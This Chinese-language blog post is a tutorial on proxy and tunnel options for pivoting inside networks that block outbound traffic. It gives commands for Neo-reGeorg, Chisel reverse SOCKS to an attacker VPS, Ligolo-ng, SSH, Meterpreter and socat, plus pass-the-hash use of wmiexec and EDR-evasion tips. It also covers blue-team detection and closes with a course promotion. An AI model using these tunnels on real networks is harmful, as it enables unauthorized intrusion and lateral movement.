内网不出网怎么办多种代理转发方案对比前言在内网渗透测试中经常遇到一种棘手场景拿下的跳板主机只能访问内网其他机器无法直接访问互联网也就是常说的不出网。防火墙、ACL 策略阻断了主机对外的出站连接常规反向 Shell、普通的反向隧道全部失效。很多新手遇到不出网环境就卡住分不清什么时候用 Web 隧道、什么时候用端口转发、什么时候选网卡层 VPN 隧道。不同方案的流量特征、稳定性、使用门槛、绕过 WAF / 防火墙的能力差别巨大。本文针对不出网场景整理主流代理转发方案包含原理、命令、适用场景、优缺点横向对比方便在授权测试中快速选型。免责声明本文内容仅用于授权内网渗透测试、靶场安全学习。严禁在未授权的内网环境搭建隧道、转发流量未经授权的网络操作违反《网络安全法》需要承担相应法律责任。一、先理清概念什么叫内网不出网不出网简单概括跳板主机可以访问内网网段但无法主动向外网发起 TCP 出站连接。细分两类场景完全不出网跳板机器任何协议都无法访问外网只有 Web 服务对外可访问Web 服务器80/443 端口可被外部访问有限出站仅允许 HTTP/HTTPS 协议出站TCP、UDP、ICMP 全部拦截DNS 也可能受限。选型核心判断✅ 如果跳板有 Web 服务外网可以访问这个 Web 地址 → 优先HTTP 正向隧道Neo-reGeorg、Suo5、冰蝎 / 哥斯拉 Socks✅ 如果跳板能主动向外发起 HTTP 出站有限出网→ Chisel、Ligolo-ng 反向隧道✅ 如果跳板是 Linux 并且开启 SSH → SSH 端口转发✅ 如果只有 Meterpreter 会话 → MSF autoroute portfwd二、方案 1Web 正向 HTTP 隧道Neo-reGeorg / Suo5Web 服务器不出网首选原理目标 Web 服务器外网可访问但是服务器本身不能主动访问外网。把隧道脚本php/aspx/jsp上传到 Web 目录攻击者本地客户端不断发送 HTTP POST 请求将 Socks5 流量封装在 HTTP 数据包里双向传输。本质是正向隧道由攻击者主动访问 Web 服务不需要目标机器主动回连公网 VPS完美解决 Web 服务器不出网场景。Neo-reGeorg 使用示例生成隧道脚本python neoreg.py generate -k test123456将生成的 tunnel.aspx 上传到网站目录本地客户端连接本地开启 1080 端口 Socks5 代理python neoreg.py -k test123456 -u shturl.cc/XuMqQiLmjcwDBUHyproxychains、BurpSuite 等工具配置 socks5://127.0.0.1:1080访问内网资产。Suo5 作为 Neo-reGeorg 升级版传输效率更高适配 WAF、反向代理环境数据包特征更难识别。✅优点专门适配Web 服务器不出网场景不需要目标主机对外发起连接只需要文件上传权限不需要执行 exe 二进制流量封装在 HTTP/HTTPS80/443 端口防火墙放行概率高。❌缺点WebShell 隧道特征明显WAF 很容易拦截隧道脚本带宽低延迟高大量 nmap 扫描速度慢依赖 Web 中间件如果 Web 目录不可写无法使用。补充冰蝎、哥斯拉内置 Socks 隧道功能原理和 Neo-reGeorg 一致拿到 webshell 后一键开启 socks快速内网横向适合临时应急。三、方案 2Chisel 单文件 HTTP 隧道有限出网场景原理Go 语言编译的单文件二进制将 TCP 流量封装在 HTTP 协议。在攻击机VPS/Kali运行 Chisel 服务端跳板机执行 Chisel 客户端主动向外网攻击机建立 HTTP 连接在攻击机本地生成 Socks5 代理端口访问跳板内网。⚠️前提跳板可以发起对外 HTTP 连接有限出网完全无任何出站的 Web 服务器场景不能用 Chisel 反向。命令示例攻击机监听./chisel server -p 8080 --reverse跳板 Windows 执行chisel.exe client 你的VPSIP:8080 R:1080:socks连接成功后攻击机本地 127.0.0.1:1080 就是 Socks5 代理。✅优点单文件跨平台 Windows/Linux体积小流量走 HTTP部分防火墙允许 HTTP 出站同时支持端口转发 Socks 代理配置简单自带流量加密。❌缺点需要上传二进制文件到跳板容易被 EDR/Defender 查杀必须跳板能够对外发起连接完全不出网 Web 服务器无法使用大量并发扫描性能一般。四、方案 3Ligolo-ng新一代 TUN 网卡隧道推荐大型内网原理Ligolo-ng 和 Socks 代理不一样它在攻击机创建虚拟 TUN 网卡相当于把内网路由直接拉到攻击机本机。不需要 proxychains所有工具nmap、CrackMapExec、ssh原生直接访问内网 IP不用代理封装。同样属于反向隧道跳板 agent 主动回连攻击机。✅优点无需 proxychains原生 IP 访问内网nmap 扫描更方便支持 TCP/UDP隧道稳定性能优于 Chisel支持多层跳板多级代理。❌缺点攻击机需要配置 TUN 网卡需要 root 权限需要上传 agent 二进制存在落地风险同样要求跳板具备对外出站能力完全不出网 Web 场景无效。五、方案 4SSH 端口转发Linux 跳板首选原理SSH 自带端口转发功能分为本地转发、远程转发、动态 Socks 代理。如果拿下 Linux 跳板跳板能 SSH 对外连接一条命令就能建立 Socks。# 动态Socks代理D参数 ssh -D 1080 user跳板IP端口转发示例把内网 3389 映射本地ssh -L 3389:192.168.1.20:3389 user跳板IP✅优点Linux 系统自带不需要额外上传工具无文件落地SSH 加密流量防火墙常放行 22 端口稳定特征相对低。❌缺点仅限有 SSH 服务的 Linux 主机Windows 跳板默认没有 SSH防火墙封禁 22 端口就失效完全不出网环境无法使用。六、方案 5MSF autoroute portfwdMeterpreter 会话场景拿到 Meterpreter 会话之后不需要额外上传隧道工具直接在会话内添加路由转发流量。适合已经获得 Meterpreter shell 的场景。# 添加内网网段路由 run autoroute -s 192.168.1.0/24 # 端口转发把内网目标端口映射到本地 portfwd add -l 4444 -p 3389 -r 192.168.1.20✅优点内置模块无需上传第三方工具❌缺点只适用于 Meterpreter 会话不支持其他 shell稳定性一般多层转发容易断连。七、方案 6socat 端口转发轻量端口映射只做单端口转发Socat 号称瑞士军刀适合单端口转发不适合全局 Socks 代理。适合只需要访问单个内网服务比如单个数据库、3389不需要全网代理。# 跳板上执行转发内网3389 socat TCP-LISTEN:13389,fork TCP:192.168.1.20:3389✅优点体积小跨平台❌缺点只能单端口映射无法全局 Socks 内网漫游大量目标操作不方便。八、各方案横向对比表表格方案适用场景是否需要跳板对外出站是否需要上传二进制优点短板Neo-reGeorg / Suo5Web 服务器外网可访问网站服务器本身不出网❌不需要✅上传脚本php/aspx/jsp不出网 Web 环境首选走 80/443延迟高WAF 容易拦截冰蝎 / 哥斯拉 Socks已有 WebShellWeb 不出网❌不需要✅webshell上手最快拿到 shell 直接开代理特征明显WAF 告警Chisel跳板有限出网可访问外网 HTTP✅需要✅上传 exe / 二进制轻量单文件配置简单完全不出网 Web 无法使用易被杀软查杀Ligolo-ng大型内网跳板有限出网✅需要✅上传 agentTUN 网卡原生路由不用 proxychains配置复杂需要 rootSSH 转发Linux 跳板开放 22 可出网✅需要❌不需要系统自带无落地流量加密Windows 不适用22 端口封禁失效MSF autorouteMeterpreter 会话看会话情况❌不需要MSF 内置无需额外工具仅限 meterpreter复杂网络不稳定Socat仅单个端口转发按需✅上传 socat极简单端口映射不支持全局 Socks 内网漫游九、选型决策流程实战直接套用先判断外网能不能直接访问跳板上的 Web 服务80/443✅能访问但是服务器本身不能访问外网 → 优先 Neo-reGeorg / Suo5 / 冰蝎 SocksWeb 正向隧道❌不能访问 Web但是跳板可以主动向外发起 HTTP 请求 → Chisel / Ligolo-ng 反向隧道如果跳板是 Linux 且 SSH 可用 → SSH 动态转发优先使用减少文件落地如果只需要访问单个内网端口3389、数据库不需要全网漫游 → socat 端口映射如果是 Meterpreter 会话 → autoroute 添加路由。实战 OPSEC 建议优先选择无二进制落地方案Web 脚本隧道、SSH 转发。上传 exe 类工具极易触发 EDR红蓝对抗中尽量减少文件落地。Web 隧道流量大、频繁 POST 请求容易被 WAF 检测不要长时间持续扫描。十、配套工具Proxychains 使用说明所有 Socks5 隧道搭建完成后Linux 攻击机使用 proxychains4 代理流量让 nmap、crackmapexec、Impacket 等工具走隧道访问内网。修改/etc/proxychains4.conf末尾socks5 127.0.0.1 1080使用示例proxychains4 python3 wmiexec.py administrator192.168.1.20 -hashes xxx注意proxychains 无法代理 raw SYN 扫描nmap 扫描必须使用-sTTCP 全连接扫描。proxychains4 nmap -sT -Pn 192.168.1.0/24十一、蓝队检测与加固方案渗透报告修复建议检测方式Web 日志大量高频 POST 请求请求包体二进制、持续长连接疑似 Neo-reGeorg/Suo5 隧道终端审计监控 chisel、ligolo、socat 等陌生二进制执行流量审计内网主机异常对外长 HTTP 连接告警异常 Socks 代理行为、大量内网横向扫描流量。加固方案严格限制服务器出站策略Web 服务器禁止任何出站访问最小化出站权限WAF 查杀 Web 隧道脚本监控异常高频 POST服务器禁止上传可执行脚本aspx/php/jsp限制网站目录权限终端 EDR 管控阻断陌生代理隧道程序运行防火墙做细粒度 ACL禁止内网主机主动访问互联网。十二、实战踩坑清单❌坑 1完全不出网 Web 服务器尝试使用 Chisel 反向隧道Chisel 需要跳板主动回连 VPS跳板不出网连接直接失败。这种场景只能用 Neo-reGeorg 这类正向 Web 隧道。❌坑 2proxychains 使用 nmap 默认 SYN 扫描扫描无结果proxychains 不支持 raw 包必须-sTTCP 全连接扫描速度会变慢。❌坑 3Web 隧道搭建成功但是访问内网卡顿、经常断连Web 隧道基于 HTTP 轮询本身延迟高大批量扫描容易触发 WAF降低扫描速率。❌坑 4上传 Chisel 立刻被 Defender 查杀Windows Defender 默认查杀 chisel红蓝对抗需要免杀处理授权测试环境优先 Web 隧道减少落地风险。❌坑 5多级跳板一层代理套一层隧道极易崩溃多层转发尽量使用 Ligolo-ngWeb 隧道不适合多层嵌套稳定性很差。十三、总结内网不出网环境核心分水岭是跳板是否可以被外网访问 Web。Web 服务器不出网用 HTTP 正向隧道跳板能有限对外发起 HTTP使用 Chisel/Ligolo 反向隧道。代理转发没有万能方案不是工具越强越好要根据防火墙出站策略、是否允许文件落地、测试场景来选择。OPSEC 角度优先选择系统自带能力减少二进制落地降低被 EDR/WAF 捕获的风险。一句话记住能访问 Web 但服务器不出网Web 正向隧道跳板能向外 HTTP 回连反向隧道Linux 跳板优先 SSH单端口转发选 socat。最后网络安全需要学习那些知识网络安全零基础入门学习路线规划初级1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级黑客这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。网络安全工程师企业级学习路线视频配套资料国内外网安书籍、文档工具当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。一些我自己买的、其他平台白嫖不到的视频教程要学习网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】